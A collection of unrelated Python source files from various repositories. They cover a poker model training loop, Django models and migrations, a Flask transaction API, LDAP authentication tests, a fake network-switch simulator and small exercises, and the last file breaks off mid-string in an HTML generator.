return all_states, all_actions, all_winnings, total_saldo
def load_opp_models(model_paths, rnd_odds):
models = []
opp_names = []
for i in range(len(model_paths)):
opp_model = m1.create_model_1()
opp_model.load_weights(model_paths[i])
models.append(opp_model)
if rnd_odds[i] == 100:
opp_names.append("random")
else:
opp_names.append(model_paths[i])
return models, rnd_odds, opp_names
gym = load_gym()
f = open("log.txt", "w")
training_model = m1.create_model_1()
training_model.load_weights("weights0012.h5")
training_model_rnd_odds = 5
#opp_models, rnd_odds, opp_name = load_opp_models(["model_1_lvl_00.h5", "model_1_lvl_00.h5", "model_1_lvl_01.h5", "model_1_lvl_02.h5"], [100, 0, 0, 0])
opp_models, rnd_odds, opp_name = load_opp_models(["model_1_lvl_01.h5"], [0])
num_iters = 50000
num_hands = 4000
what_if_play = True
do_training = True
training_epochs = 30
# Leveling params
saldo_limit_for_next_lvl = 200
next_level = 4
max_opp_models = 20
for i in range(num_iters):
print("\nIteration:", i, "\n", file=f)
f.flush()
states = []
actions = []
winnings = []
#saldos = []
go_to_next_level = True
# Play against opp models
for j in range(len(opp_models)):
print("Playing vs", opp_name[j], file=f)
f.flush()
start_time = time.time()
st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play)
elapsed_time = time.time() - start_time
states.append(st)
actions.append(act)
winnings.append(winn)
#saldos.append(saldo)
if saldo[0] < saldo_limit_for_next_lvl:
go_to_next_level = False
print("Played", num_hands, "hands in", round(elapsed_time), "seconds", round(1000 * elapsed_time / num_hands), "ms per hand", file=f)
print("Saldo vs", opp_name[j], saldo, "\n", file=f)
f.flush()
if do_training and go_to_next_level:
file_name = "model_1_lvl_" + str(next_level).zfill(2) + ".h5"
print("Went to next level:", file_name, "\n", file=f)
f.flush()
training_model.save_weights(file_name)
next_level += 1
# Push training model to opponent models
opp_models.append(training_model)
rnd_odds.append(0)
opp_name.append(file_name)
if len(opp_models) > max_opp_models:
opp_models.pop(0)
rnd_odds.pop(0)
opp_name.pop(0)
# Make new training model. Continue where last one left off
training_model = m1.create_model_1()
training_model.load_weights(file_name)
if do_training:
print("Now training\n", file=f)
f.flush()
for j in range(len(states)):
real_epochs = training_epochs
#if (saldos[j][0] < 0):
# real_epochs *= 2
start_time = time.time()
m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs)
elapsed_time = time.time() - start_time
print("Trained", real_epochs, "epochs in", round(elapsed_time), "seconds", round(elapsed_time / real_epochs, 2), "seconds per epoch", file=f)
f.flush()
file_name = "weights" + str(i).zfill(4) + ".h5"
training_model.save_weights(file_name)
print("\nSaved weights:", file_name, file=f)
f.flush()
f.close() | 2.609375 | 3 |
project/migrations/0004_auto_20191027_2049.py | Belie06Loryn/Project_Post | 0 | 12794330 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-10-27 18:49
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('project', '0003_voting'),
]
operations = [
migrations.RemoveField(
model_name='foto',
name='category',
),
migrations.RemoveField(
model_name='foto',
name='designer',
),
migrations.RemoveField(
model_name='foto',
name='tags',
),
migrations.AddField(
model_name='foto',
name='profiles',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='project.Profile'),
),
]
| 1.554688 | 2 |
topcoder/solutions/SortEstimate.py | 0x8b/HackerRank | 3 | 12794331 | <reponame>0x8b/HackerRank<gh_stars>1-10
#!/usr/bin/env python
import math
def how_many(c, time):
assert 1 <= c <= 100
assert 1 <= time <= 2000000000
left, right = 1, 2000000000
while not right - left < 1e-9:
n = (left + right) / 2
if n * math.log(n, 2) >= time / c:
right = n
else:
left = n
return left
assert abs(how_many(1, 8) - 4) < 1e-9
assert abs(how_many(2, 16) - 4) < 1e-9
assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9
assert abs(how_many(1, 2000000000) - 7.637495090348122e7) < 1e-9
| 3.03125 | 3 |
tests/test_vembrane.py | FelixMoelder/vembrane | 0 | 12794332 | from pathlib import Path
import os
from pysam import VariantFile
import pytest
import yaml
from vembrane import errors
from vembrane import __version__, filter_vcf
CASES = Path(__file__).parent.joinpath("testcases")
def test_version():
assert __version__ == "0.1.0"
@pytest.mark.parametrize(
"testcase", [d for d in os.listdir(CASES) if not d.startswith(".")]
)
def test_filter(testcase):
path = CASES.joinpath(testcase)
with open(path.joinpath("config.yaml")) as config_fp:
config = yaml.load(config_fp, Loader=yaml.FullLoader)
vcf = VariantFile(path.joinpath("test.vcf"))
if "raises" in config:
exception = getattr(errors, config["raises"])
from vembrane import check_filter_expression
with pytest.raises(exception):
# FIXME we have to explicitly check the filter expression here
# until we change from calling filter_vcf
# to actually invoking vembrane.main
check_filter_expression(config.get("filter_expression"))
list(
filter_vcf(
vcf,
config.get("filter_expression"),
config.get("ann_key", "ANN"),
config.get("keep_unmatched", False),
)
)
else:
expected = list(VariantFile(path.joinpath("expected.vcf")))
result = list(
filter_vcf(
vcf,
config.get("filter_expression"),
config.get("ann_key", "ANN"),
config.get("keep_unmatched", False),
)
)
assert result == expected
| 2.03125 | 2 |
tests/test_authLdap.py | kakwa/dnscherry | 9 | 12794333 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import with_statement
from __future__ import unicode_literals
import pytest
import sys
from sets import Set
from dnscherry.auth.modLdap import Auth, CaFileDontExist
import cherrypy
import logging
import ldap
cfg = {
'auth.ldap.module': 'dnscherry.backend.ldap',
'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org',
'auth.ldap.userdn': 'ou=People,dc=example,dc=org',
'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org',
'auth.ldap.bindpassword': 'password',
'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389',
'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem',
'auth.ldap.starttls': 'off',
'auth.ldap.checkcert': 'off',
'auth.ldap.user.filter.tmpl': '(uid=%(login)s)',
'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)',
'auth.ldap.dn_user_attr': 'uid',
'auth.ldap.group_attr.member': "%(dn)s",
'auth.ldap.timeout': 10,
}
def syslog_error(msg='', context='',
severity=logging.INFO, traceback=False):
pass
cherrypy.log.error = syslog_error
attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn']
class TestError(object):
def testNominal(self):
inv = Auth(cfg, cherrypy.log)
return True
def testConnectSSLNoCheck(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'off'
inv = Auth(cfg2, cherrypy.log)
ldap = inv._connect()
ldap.simple_bind_s(inv.binddn, inv.bindpassword)
def testConnect(self):
inv = Auth(cfg, cherrypy.log)
ldap = inv._connect()
ldap.simple_bind_s(inv.binddn, inv.bindpassword)
return True
def testConnectSSL(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'on'
inv = Auth(cfg2, cherrypy.log)
ldap = inv._connect()
ldap.simple_bind_s(inv.binddn, inv.bindpassword)
def testLdapUnavaible(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://notaldap:636'
cfg2['checkcert'] = 'on'
inv = Auth(cfg2, cherrypy.log)
try:
ldapc = inv._connect()
ldapc.simple_bind_s(inv.binddn, inv.bindpassword)
except ldap.SERVER_DOWN as e:
return
def testMissingCA(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'on'
cfg2['ca'] = './test/cfg/not_a_ca.crt'
try:
inv = Auth(cfg2, cherrypy.log)
ldapc = inv._connect()
except CaFileDontExist as e:
return
def testConnectSSLWrongCA(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'on'
inv = Auth(cfg2, cherrypy.log)
ldapc = inv._connect()
try:
ldapc.simple_bind_s(inv.binddn, inv.bindpassword)
except ldap.SERVER_DOWN as e:
assert e[0]['info'] == 'TLS: hostname does not match CN in peer certificate'
def testConnectStartTLS(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldap://ldap.dnscherry.org:390'
cfg2['checkcert'] = 'off'
cfg2['starttls'] = 'on'
cfg2['ca'] = './test/cfg/ca.crt'
inv = Auth(cfg2, cherrypy.log)
ldapc = inv._connect()
ldapc.simple_bind_s(inv.binddn, inv.bindpassword)
def testAuthSuccess(self):
inv = Auth(cfg, cherrypy.log)
ret = inv.check_credentials('jwatson', '<PASSWORD>')
assert ret == True
def testAuthFailure(self):
inv = Auth(cfg, cherrypy.log)
res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>')
assert res == False
def testMissingParam(self):
cfg2 = {}
return True
try:
inv = Auth(cfg2, cherrypy.log)
except MissingKey:
return
| 1.84375 | 2 |
fake-switches/run_switch.py | CC-Digital-Innovation/devops-workshop | 0 | 12794334 | <reponame>CC-Digital-Innovation/devops-workshop
from twisted.internet import reactor
from fake_switches.switch_configuration import SwitchConfiguration, Port
from fake_switches.transports.ssh_service import SwitchSshService
from fake_switches.dell.dell_core import DellSwitchCore
class CustomSwitchConfiguration(SwitchConfiguration):
def __init__(self, *args, **kwargs):
super(CustomSwitchConfiguration, self).__init__(objects_overrides={"Port": CustomPort}, *args, **kwargs)
class CustomPort(Port):
def __init__(self, name):
self._access_vlan = None
super(CustomPort, self).__init__(name)
@property
def access_vlan(self):
return self._access_vlan
@access_vlan.setter
def access_vlan(self, value):
if self._access_vlan != value:
self._access_vlan = value
print("This could add vlan to eth0")
if __name__ == '__main__':
ssh_service = SwitchSshService(
ip="127.0.0.1",
port=11001,
switch_core=DellSwitchCore(CustomSwitchConfiguration("127.0.0.1",
"NEXT-TEST",
ports=[
CustomPort("Eth1/1"),
CustomPort("Eth1/2"),
CustomPort("Eth1/3"),
CustomPort("Eth1/4"),
CustomPort("Eth1/5"),
CustomPort("Eth1/6"),
CustomPort("Eth1/7"),
CustomPort("Eth1/8"),
CustomPort("Eth1/9"),
CustomPort("Eth1/10"),
CustomPort("Eth1/11"),
CustomPort("Eth1/12"),
CustomPort("Eth1/13"),
CustomPort("Eth1/14"),
CustomPort("Eth1/15"),
CustomPort("Eth1/16"),
CustomPort("Eth1/17"),
CustomPort("Eth1/18"),
CustomPort("Eth1/19"),
CustomPort("Eth1/20"),
CustomPort("Eth1/21"),
CustomPort("Eth1/22"),
CustomPort("Eth1/23"),
CustomPort("Eth1/24"),
CustomPort("Eth1/25"),
CustomPort("Eth1/26"),
CustomPort("Eth1/27"),
CustomPort("Eth1/28"),
CustomPort("Eth1/29"),
CustomPort("Eth1/30"),
CustomPort("Eth1/31"),
CustomPort("Eth1/32"),
CustomPort("mgmt0"),
CustomPort("Lo0"),
])))
ssh_service.hook_to_reactor(reactor)
reactor.run() | 2.390625 | 2 |
design/server/api/Transaction.py | smdsbz/database-experiment | 0 | 12794335 | <gh_stars>0
# -*- coding: utf-8 -*-
from flask import request
from flask_restful import Resource
from flask_restful import abort
import decimal as D
from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao
from db import ShiftsDao, VIPTransRecordDao
from .Auth import auth
merch_dao = MerchandiseDao()
trans_dao = TransactionDao()
detail_dao = TransDetailDao()
employ_dao = EmployeeDao()
shift_dao = ShiftsDao()
viprec_dao = VIPTransRecordDao()
class TransactionApi(Resource):
@auth.login_required
def get(self, start: int, count: int):
'''
Arguments
---------
start: int
count: int
Maximum rows to return. If <= 0, return all rows.
'''
sql = f'''
select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`)
from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D
where T.`id` >= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id`
group by T.`id`
order by T.`time` desc
'''
if count > 0:
sql += ' limit %s'
value = (start, count)
else:
value = (start,)
with trans_dao._conn.cursor() as cur:
try:
cur.execute(sql, value)
result = [row for row in cur]
trans_dao._conn.commit()
except Exception as e:
trans_dao._conn.rollback()
abort(500, str(e))
return [
{
'trans_id': row[0],
'time': row[1].strftime('%Y-%m-%d %H:%M:%S'),
'cashier_id': row[2],
'cashier_login': row[3],
'sum': float(row[4])
}
for row in result
], 200
@auth.login_required
def post(self):
'''
JSON data format:
{
'vip_id': vip_id or None
'cashier': cashier_id: int,
'trans': [
[merch_id: int, actual_price: float, count: int],
...
]
}
'''
data = request.get_json()
if 'cashier' not in data or 'trans' not in data:
return {
'reason': 'cashier, trans data must be given!'
}, 406
cashier, trans_items = data['cashier'], data['trans']
vip_id = data['vip_id'] if 'vip_id' in data else None
if not employ_dao.has_id(cashier):
return {
'reason': f'Cashier ID {cashier} is illegal!'
}, 406
conn = trans_dao._conn
with conn.cursor() as cur:
try:
trans_id = trans_dao.start(cashier, cur)
# create transaction master record
if trans_id < 0:
conn.rollback()
abort(500, message='Failed to start transaction!')
# consume stored merchandise
for merch_id, _, count in trans_items:
ret = merch_dao.consume(merch_id, count, cur)
if ret:
conn.rollback()
if ret == -1 or ret == 3:
return {
'merch_id': merch_id,
'reason': 'Illegal ID'
}, 406
if ret == 1:
return {
'merch_id': merch_id,
'reason': 'Not enough in storage'
}, 406
if ret == 2:
return {
'merch_id': merch_id,
'reason': 'UPDATE finished with error'
}, 406
abort(500, message=f'Unknown error at consume(): {ret}.')
# fill transaction details
if detail_dao.fill(trans_id, trans_items, cur):
conn.rollback()
abort(500, message='Error occured while filling '
'transaction details!')
# get sum of current transaction
trans_sum = detail_dao.get_sum(trans_id, cur)
if trans_sum is None:
conn.rollback()
abort(500)
# update VIP card info
if vip_id is not None:
ret = viprec_dao.transact_cb(vip_id, trans_sum, cur)
if ret != 0 and ret != 1:
conn.rollback()
if ret == -1:
return {
'vip_id': vip_id,
'reason': 'Invalid VIP ID'
}, 406
if ret == 2:
return {
'vip_id': vip_id,
'reason': 'VIP card timeout'
}, 406
abort(500, message='Unknown error at VIPTransRecordDao'
f'.transact_db(): {ret}.')
# update shifts info
if shift_dao.transact_cb(cashier, trans_sum, cur):
conn.rollback()
return {
'reason': f'Employee {cashier} not logged in!'
}, 406
conn.commit()
except Exception as e:
conn.rollback()
abort(500, message=str(e))
return '', 200
class TransDetailApi(Resource):
@auth.login_required
def get(self, trans_id: int):
sql = f'''
select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price,
D.`count`
from `{merch_dao._table}` as M, `{detail_dao._table}` as D
where D.`trans_id` = %s and M.`id` = D.`merch_id`
'''
value = (trans_id,)
with detail_dao._conn.cursor() as cur:
try:
cur.execute(sql, value)
ret = [row for row in cur]
detail_dao._conn.commit()
except Exception as e:
detail_dao._conn.rollback()
abort(500, message=str(e))
return [
{
'merch_id': row[0],
'name': row[1],
'actual_price': float(row[2]),
'orig_price': float(row[3]),
'count': row[4]
}
for row in ret
]
| 2.390625 | 2 |
doge/filter/__init__.py | zhu327/doge | 163 | 12794336 | from typing import Any
from gevent.monkey import patch_thread # type: ignore
from doge.common.doge import Executer, Request, Response
from doge.common.utils import import_string
patch_thread()
class BaseFilter(Executer):
def __init__(self, context: Any, _next: Executer):
self.next = _next
def execute(self, req: Request) -> Response:
return self.next.execute(req)
class FilterChain:
def __init__(self, context: Any):
self.context = context
def then(self, executer: Executer) -> Executer:
filters = self.context.url.get_param("filters", [])
for cls in reversed([import_string(f) for f in filters]):
executer = cls(self.context, executer)
return executer
| 2.046875 | 2 |
solution/string/no_58_2_left_rotate.py | LibertyDream/algorithm_data_structure | 0 | 12794337 | '''面试题58-2:左旋转字符串
字符串的左旋转操作是把字符串前面的若干个字符转移到字符串的尾部。
请定义一个函数实现字符串左旋转操作的功能。
---------------
input: abcdefg 2
output: cdefgab
'''
def left_rotate(string, n):
if string is None or len(string) == 0:
return None
if n < 0 or n >len(string):
return None
str_arr = [x for x in string]
begin = 0
div = n - 1
end = len(string) - 1
__reverse(str_arr, begin, div)
__reverse(str_arr, div+1, end)
__reverse(str_arr, begin, end)
return ''.join(str_arr)
def __reverse(str_arr, begin, end):
while begin < end:
str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin]
begin += 1
end -= 1
if __name__ == "__main__":
string = 'abcdefg'
rotate = 2
print('"%s" left rotate %d: %s' % (string, rotate, left_rotate(string, rotate))) | 3.859375 | 4 |
Projects/Online Workouts/w3resource/Collections/program-9.py | ivenpoker/Python-Projects | 1 | 12794338 | #!/usr/bin/env python3
############################################################################################
# #
# Program purpose: Adds more number of elements to a deque object from an iterable #
# object. #
# Program Author : <NAME> <<EMAIL>> #
# Creation Date : December 27, 2019 #
# #
############################################################################################
from random import randint
from collections import deque
def create_random_deque(low: int, high: int, size: int) -> deque:
if size < 0:
raise ValueError(f'Invalid size ({size}) for new deque')
return deque([randint(low, high) for _ in range(size)])
def add_nums_to_deque(source_deque: deque, max_ext: int) -> None:
if max_ext < 0:
raise ValueError(f'Invalid max size ({max_ext}) for deque')
return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)])
if __name__ == "__main__":
new_deque = create_random_deque(low=0, high=20, size=5)
print(f'New deque: {new_deque}')
# Extend deque with 5 random data.
add_nums_to_deque(source_deque=new_deque, max_ext=5)
print(f'Extended deque: {new_deque}')
| 3.90625 | 4 |
parts/app/partsnumber/models.py | heljhumenad/parts-arrival | 3 | 12794339 | from django.db import models
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from parts.core.managers import AbstractUpdateViewManager
from parts.core.models import TimeStampModel
class PartsNumber(AbstractUpdateViewManager, TimeStampModel):
SOURCE_CODE = (
("01", "Nissan Japan-01"),
("02", "Nissan Taiwan-02"),
("05", "Nissan Thailand-05"),
("08", "Nissan Indonesia-08"),
)
PARTNUMBER_STATUS = (
("Active", "Active"),
("Depcreated", "Depcreated"),
("Obsolete", "Obsolete"),
("Deactivated", "Deactivated"),
)
partnumber = models.CharField(
max_length=200,
verbose_name=_("Parts Number")
)
source_code = models.CharField(
max_length=200,
verbose_name=_("Source Code"),
choices=SOURCE_CODE
)
bar_code = models.CharField(
max_length=200,
verbose_name=_("Barcode No.")
)
selling_price = models.IntegerField(
verbose_name=_("Selling Price")
)
status = models.CharField(
max_length=200,
verbose_name=_("Status"),
choices=PARTNUMBER_STATUS
)
unit_measure = models.ForeignKey(
"UnitMeasure",
verbose_name=_("Stock/UM"),
on_delete=models.CASCADE
)
class Meta:
db_table = _("partnumbers")
verbose_name = _("Part Number")
verbose_name_plural = _("Parts Number")
ordering = ["id"]
def __str__(self):
return self.partnumber
def get_absolute_url(self):
return reverse('parts_number_read_view', args=[str(self.id)])
# !Find way to handle this feat in template
@property
def add_leading_zero(self):
return str(self.selling_price) + ".00"
class UnitMeasure(AbstractUpdateViewManager, TimeStampModel):
um = models.CharField(
max_length=20,
verbose_name=_("Unit of Measure")
)
class Meta:
db_table = _("um")
verbose_name = _("Unit of Measure")
verbose_name_plural = _("Unit of Measures")
ordering = ["id"]
def __str__(self):
return self.um
class PartNumberClass(AbstractUpdateViewManager, TimeStampModel):
class_name = models.CharField(
max_length=20,
verbose_name=_("Class name")
)
charge_type = models.CharField(
max_length=20,
verbose_name=_("Charge Type")
)
class Meta:
db_table = _("partnumber_class")
verbose_name = _("Part Number Class")
verbose_name_plural = _("Part Number Classes")
ordering = ["id"]
def __str__(self):
return self.class_name.upper()
def get_absolute_url(self):
return reverse('item_class_read', args=[str(self.id)])
| 2.140625 | 2 |
backend/app/views/common_data.py | Edinburgh-Genome-Foundry/CAB | 19 | 12794340 | <reponame>Edinburgh-Genome-Foundry/CAB<gh_stars>10-100
import os
data_path = os.path.join("app", "data", "example_data_file.txt")
with open(data_path, "r") as f:
DATA = f.read()
| 1.867188 | 2 |
example_problem/settings/daphne_fields.py | seakers/daphne-brain | 0 | 12794341 | daphne_fields = ['context', 'data']
| 1.015625 | 1 |
python/problem6.py | shubhamoy/project-euler-solutions | 1 | 12794342 | <filename>python/problem6.py
#!/usr/bin/python
sosq = 0
sqos = 0
for i in range(1, 101):
sosq += i*i
sqos += i
diff = (sqos * sqos) - sosq
print "Sum of Squares: ", str(sosq)
print "Squares of Sum: ", str(sqos*sqos)
print "Difference: ", str(diff)
| 3.484375 | 3 |
euler-29.py | TFabijo/euler | 0 | 12794343 | <filename>euler-29.py
def različne_potence(a_max,b_max):
stevila = set()
for a in range(2,a_max+1):
for b in range(2,b_max+1):
stevila.add(a**b)
return len(stevila)
različne_potence(100,100)
| 3.078125 | 3 |
Icons/fu4028.py | friedc/fu | 0 | 12794344 | #----------------------------------------------------------------------
# This file was generated by C:\Python27\Scripts\img2py
#
from wx.lib.embeddedimage import PyEmbeddedImage
fu4028 = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B"
"AACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAAh8SURBVFhHzVgLbFTHFT379r/rXa/t"
"XZvFv1ITjCGJaQsEEFSiqQrBNIUAhrZpcFJIqqZRKpGojUgl1OZD2gQQARGpQQ0NpJBGClIk"
"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp"
"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3"
"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H"
"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH"
"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr"
"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV"
"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db"
"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1"
"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY"
"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+"
"<KEY>
"<KEY>"
"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv"
"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o"
"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR"
"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99"
"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr"
"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U"
"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl"
"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x"
"<KEY>"
"<KEY>"
"<KEY>"
"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU"
"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD"
"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j"
"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS"
"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ"
"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"M34/i8LqjRvw3iHWQ0ISdRniUp1hLIrnTf2M6N8hxAm94LXNuH9LAb3ATQrLE8SL6iWQ4ThN"
"Ysnk2S28XYJX3xx3jKQbY7x1dyPKq3aGBzR4oxDxJ9698OSTKtudQU8rh3rnoreX2ToYU8SK"
"aOLxC15W2E/yPpmEMGGMai/x18TCBxbBZBQlKwtpPu/9q4Vhp5ixvGLj8mXgwAE8VluLmiWM"
"6v8ShYU7cPWqG7y0KOIbG7NUWroKDQ1Ae7viC/Buir4+Hfb+bo86M4svfjQdoIQPTp+GxOXW"
"zZmDb69cqTD8LxDnRbehYRfOnv2YOVmFxYu/i/nz59GTXTh+/GW0tbXD7V6J9es3wmKxqrOy"
"mPDDPc7MFTCydv0/EI1GeEUz8w6pBiCRTGZodBRW/mC6FSYYeDfiLv/PAvB3isaIzRpkElEA"
"AAAASUVORK5CYII=")
getfu4028Data = fu4028.GetData
getfu4028Image = fu4028.GetImage
getfu4028Bitmap = fu4028.GetBitmap
| 1.421875 | 1 |
src/main.py | feizhang365/tablestruct2word | 0 | 12794345 | # -*- encoding: utf-8 -*- #
__author__ = 'FeiZhang <EMAIL>'
__date__ = '2019-07-20'
from mysqlconn import MyConn
from settings import DB_CONFIG
from gendocx import gen_doc, doc_append_table
def main():
"""
entry point
:return:
"""
try:
my_conn = MyConn(DB_CONFIG)
conn = my_conn.conn
with conn.cursor() as cursor:
cursor.execute("SHOW TABLES")
tb_list = cursor.fetchall()
doc = gen_doc('数据库表结构说明', 'FEIZHANG')
for tb in tb_list:
print(tb)
tb_name = tb[0]
cursor.execute("SHOW FULL FIELDS FROM {}".format(tb_name))
# Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment
tb_rs = cursor.fetchall()
# get table comment info
cursor.execute("SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\
AND table_name='{}'".format(DB_CONFIG['db'], tb_name))
tb_comment = cursor.fetchone()[0]
# print("列名", "数据类型", "Null", "Key", "Default", "栏位说明")
# for r in tb_rs:
# print(r[0], r[1], r[3], r[4], r[5], r[8])
doc_append_table(doc, tb_rs, tb_name, tb_comment)
output_file_name = "outputdoc/{}.docx".format(DB_CONFIG['db'])
with open(output_file_name, "w") as file:
doc.save(output_file_name)
finally:
conn.close()
if __name__ == '__main__':
main()
| 2.6875 | 3 |
mtml/toy/tests/test_avimadsen.py | crb479/mcdevitt-trauma-ml | 5 | 12794346 | from ..avimadsen import add_user_tag
from .. import echo_args
def test_avimadsen():
wrapped_echo_args = add_user_tag(echo_args)
print(wrapped_echo_args('test1', 'test2'))
assert(hasattr(wrapped_echo_args, '__user_tag__') and
(wrapped_echo_args.__user_tag__ == 'avimadsen')) | 2.609375 | 3 |
pyPack/html.py | slozano54/projetDNB | 1 | 12794347 | #!/usr/bin/python3
#-*- coding: utf8 -*-
# @author : <NAME>
"""
Génère une page HTML.
"""
pass
# On fait les imports nécessaires selon le contexte
# Pour pouvoir créer un répertoire, ici pour y mettre les fichiers HTML
import os
# On fait les imports nécessaires selon le contexte
# Pour générer les fichiers HTML
if __name__ == "__main__":
from HTML_constantes import *
else:
from pyPack.HTML_constantes import *
############################################################################################################
# Générer le fichier pagesWeb/index.HTML
############################################################################################################
def main():
"""
Fonction principale qui sera appelée pour générer l'ensemble des pages HTML.
"""
pass
# On remonte d'un niveau
#os.chdir("../")
# On crée le dossier qui va accueillir les fichiers HTML si il n'existe pas
if not os.path.exists("./pagesWeb/"):
os.mkdir("./pagesWeb/")
# On ouvre en écriture le fichier html qui va recevoir le code
indexHTML = open("./pagesWeb/index.html", "w")
# On ajoute le doctype et le head
for elt in docTypeHeadStyle:
indexHTML.writelines(elt)
# On ouvre le body
indexHTML.writelines(["<body>\n"])
# On ajoute les éléments de la barre de navigation
for elt in barreDeNavigation:
indexHTML.writelines(elt)
# On ajoute une partie spécifique
indexHTML.writelines([
"""
<h2>ACCUEIL</h2>\n
<p> Le projet consiste à récupérer tous les exercices des sujets DNB en partage sur le site de l'APMEP<br>
Pour le moment le test se fait sur le premier exo du sujet de polynésie 2020<br><br>
Pour générer la documentation il faut installer le paquet python <a href="https://pdoc3.github.io/pdoc/" target="_blank"> pdoc3</a>
</p>
<h3>Auteur</h3>
<p><NAME></p>
<h3> Installation et utilisation </h3>
<p>La procédure a été testé sous <b>Linux</b> uniquement.
<ul>
<li>Télécharger cette <a href="https://github.com/slozano54/projetDNB/archive/master.zip"> archive zip</a></li>
<li>Décompresser l'archive</li>
<li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li>
<li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li>
<li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li>
</ul>
</p>
<h3> Notes </h3>
<p>
Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br>
